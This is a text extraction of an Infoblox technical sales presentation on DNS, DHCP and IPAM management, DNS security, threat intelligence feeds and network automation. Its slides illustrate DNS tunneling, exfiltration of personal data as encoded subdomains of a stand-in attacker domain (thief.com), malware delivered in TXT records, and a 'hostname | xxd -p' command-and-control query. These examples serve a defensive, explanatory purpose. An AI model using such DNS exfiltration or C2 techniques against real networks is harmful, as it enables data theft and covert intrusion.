Professional Documents
Culture Documents
Presentacion Infoblox - Tecnica
Presentacion Infoblox - Tecnica
1 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Infoblox Overview & Business Update
2 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Traditional Core Network Services (DNS, DHCP and IPAM)
Integrated DDI for physical and virtual
environments
Authoritative IPAM Advanced Infoblox
• Visibility Reporting DNS/DHCP
• Efficiency
• Control
Network Task Microsoft
Automation DNS/DHCP
DNS
• Secure
• Intelligent
• Extensible
Virtual Discovery IP network Discovery
DHCP
• Automation
• Insight
Network
IP Endpoints Switch/Routers
3 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Flexible Deployment Options with Microsoft
4 | © 2013
2018 Infoblox Inc. All Rights Reserved.
The Infoblox Advantage – Patented Grid Technology
Centralized Visibility & control of core
network services
Grid Member
with DNS Firewall
Infoblox
Threat data feeds
Grid Member
Grid DNS / DHCP
for use in
Network ecosystem
Insight
5 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Infoblox Evolution
DDI with Authoritative IPAM
6 | © 2013
2018 Infoblox Inc. All Rights Reserved.
NGDDI Microsoft Integration, AD User Identity Mapping
8 | © 2013
2018 Infoblox Inc. All Rights Reserved.
NGDDI Security and Analytics,
Reporting, Auditing and Forensic
Application Security
Uptime
Monitor the health and Stop security breaches
status of the core services before they occur and
supporting your business detect and control APT’s
critical applications and faster.
predict future
Compliance Capacity
Planning
Quickly generate
compliance reports, Track, trend and predict
without impacting the key capacity parameters
performance of grid over time, to ensure
members. your core network
services match growth.
9 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Infoblox NGDDI, Most Accurate Information
Authoritative Network Database
What IP? ONE SHOT
DHCP Service / Discovery
What has
When Appear? happened in the
Allocate / Discovery / Cloud
past?
Which MAC ? DHCP or Discovery
IP, User,
hostname, RPZ,
Device Type? DHCP Fingerprint lease…
Availability
• Intelligent traffic management for global services
• Services performance optimization
• Global and Local proximity delivery services
Cloud
• Ongoing evolution of the Data Center
• Private, Public, Hybrid
Automation
• Budget for IT headcount continues to decline
• Skilled staff more difficult to find and retain
11 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Infoblox Evolution
DDI with Secure DNS
12 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Malware Exploiting DNS
• Over 91% percent malware uses DNS
̶ To gain command and control
̶ To exfiltrate data
̶ To redirect traffic
• Despite adversaries’ reliance on DNS,
68% organizations do not monitor
recursive DNS
• Advanced attacks and data breaches
persist and impact all sizes and types of
organizations
• Average total cost of data breach ~$3.8M
USD
• The question isn’t if, but when you will be
attacked, and how effectively you can
respond
13 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Hiding network Data via DNS Tunneling
• Uses DNS as a covert communication channel to
bypass firewalls
Internet
• Attacker tunnels other protocols like SSH, or web
within DNS
• Enables attackers to easily insert malware, pass INTERNET
Slow DNS
14 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Data Exfiltration over DNS Queries
Malware Steals File Containing Sensitive Data
• Infected endpoint gets access to file
containing sensitive data
• It encrypts and converts info into NameMarySmith.foo.thief.com
MRN100045429886.foo.thief.com
encoded format DOB10191952.foo.thief.com
Internaldomain.foo.thief.com
• Text broken into chunks and sent via Company.foo.thief.com
NameMarySmith.foo.thief.com
23
2f(
MRN100045429886.foo.thief.com
+1
DOB10191952.foo.thief.com
Internaldomain.foo.thief.com
+12f(2354ayqv1asdf7s6ex
Company.foo.thief.com Xc786asdf89xcbv897sadfjlw
fityhkjDR65eUGYbjkUY6756
nkjFYVW$%&(YBH$JKGHkjh
Compromised
Endpoint
15 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Malware Infiltration over DNS - TXT
"f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAUBpAAAAAAABAAAAAAAAAAO
CQAgAAAAAAAAAAAEAAOAAIAEAAJQAiAAYAAAAFAAAAQAAAAAAAAABA
AEAAAAAAAEAAQAAAAAAAwAEAAAAAAADAAQAAAAAAAAgAAAAAAAAAA
wAAAAQAAAAAAgAAAAAAAAACQAAAAAAAAAJAAAAA" Command
and Control
Rogue DNS Server Quer
y for TX
T
DDNS update
Query for TXT "f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAUBpAAAAAAABAAAAAAAAAAO
CQAgAAAAAAAAAAAEAAOAAIAEAAJQAiAAYAAAAFAAAAQAAAAAAAAABA
AEAAAAAAAEAAQAAAAAAAwAEAAAAAAADAAQAAAAAAAAgAAAAAAAAAA
wAAAAQAAAAAAgAAAAAAAAACQAAAAAAAAAJAAAAA"
16 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Infiltration and C&C behavior infection
17 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Command and Control
Signaling and Control responses with DNS
hostname | xxd -p
Query A -> 6a75747465722d6d62702e6c6f63616c0a.thief.com
18 | © 2013
2018 Infoblox Inc. All Rights Reserved.
DNS is Coverage? YES with Infoblox
App Offerings
Salesforce.com
Office 365
Workday – HR
SAP
Firewall/NGFW
Your SIEM Solution
• Centralized logging and reporting
IPS/IDS
19 | © 2013
2018 Infoblox Inc. All Rights Reserved.
The Motion of Malware Through Networks
Malware uses DNS at every stage
Infiltration Infection Exfiltration
Query malicious domains and Download Malware to the Transport the data offsite
report to C &C infected host
22 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Infoblox TIDE – External Threat Feeds
Solution Overview
• Infoblox ActiveTrust receives
threat data from third-party
sources
• This third party data is then
managed from within Infoblox
TIDE.
Benefits
Infoblox 1. Collect and manage curated
TIDE threat intelligence in a single
platform
2. Maximize resources by giving
back time to the security
operations and threat
intelligence team
23 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Leveraging Threat Intel Across Entire
Security Infrastructure
Phishing &
SURBL Malware URLs Various
TIDE file
Marketplace Define Data Spambot IPs formats
Policy,
Governance & C&C & Malware
Custom TI Translation Host/Domain
24 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Streaming DNS Threat Insight Analytics Works
temporal analysis
3. Certain attributes add to a threat score, Size Lexical
25 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Infoblox ActiveTrust Cloud as a Service
Machine Readable
Threat Intelligence
ActiveTrust as a Service + Multi-pronged Threat Detection and
Threat Intelligence + Threat Insight as a Service
Prevention
• Aggregated & shared Threat Intelligence,
TIP designed for enterprises
ase
P Le • DNS Reputation
C
Download Threat Intelligence DH
gs, sight
st Lo
In • Behavioral Analytics, data exfiltration
Tru ork
c tive Netw
A
Data Collector VM
Internal Authoritative DNS + NAT + Firewall NAT + Firewall
ActiveTrust + Threat Intelligence End to End Protection
• On/off premise
• Roaming devices
26 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Infoblox as part of Cybersecurity Orchestration
Accelerating Incident Handling and Response with Automation
Application and
Business Context
IPAM • “Metadata” via Extended
Attributes: Owner, app, security
level, location, ticket number
27 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Infoblox Advanced DNS Protection - ADP
WHERE IT FITS
The solution components of Advanced
DNS Protection include:
• Software ADP:
For organizations with lower capacity
requirements with a lower entry price
point.
• Infoblox Appliances:
Trinzic hardware and virtual
appliances consist of Trinzic TE-
1410/1420/ 815/825/1415 appliances
with software ADP subscription add-
on. Virtual appliances are supported
on VMware and KVM.
• Advanced DNS Protection Service:
The software plus Threat Adapt
technology provides ongoing
protection against existing and
evolving threats to the DNS server.
• Reporting and Analytics:
Deep visibility and rich network
context around attack patterns and
sources.
28 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Infoblox Network Automation - NetMRI
29 | © 2013
2018 Infoblox Inc. All Rights Reserved.
What is NetMRI?
Origin: Network Consulting Assessments...
1. Network Discovery and Inventory
̶ Network friendly
̶ Network constructs, not just devices
(routes, VLANs, VRRP Pairs, etc.)
̶ Multi-layer topology
̶ Auto correlation
2. Network Configuration Analysis
̶ Proactive identification of hidden problems
with no fault or perf symptoms
̶ Port duplex mismatch, VLAN member
riorities, VRRP not recognizing peer, etc.
3. Security Policy Enforcement
̶ Bundled content
̶ Easy customization + unique capabilities
̶ Auto analysis, auditing, and reporting
4. Change Automation & Config Mgmt
̶ Change Detection, Audit, Config B/U, etc.
̶ Advanced / unique change automation
30
30 | © 2013
2018 Infoblox Inc. All Rights Reserved.
NetMRI Deployment Overview = Appliance
NetMRI
Real-time & Historical
Analysis
• Network discovery
• Built-in analysis
• Check against best practices Collected Via:
• Check against security policies SNMP
• Detect issues CLI/configuration
• Monitor and manage change Syslog
• Automate change Fingerprinting
• Switch port management
31 | © 2013
2018 Infoblox Inc. All Rights Reserved.
3
Pre-SALES:
David Alfonso
david.alfonso@arrow.com
+34 660 252 134
SALES:
Patricia Cobo
patricia.cobo@arrow.com
+34 690 992 921
Pre-SALES:
Angel Aviles
angel.aviles@arrow.com
32 | © 2013
2018 Infoblox Inc. All Rights Reserved.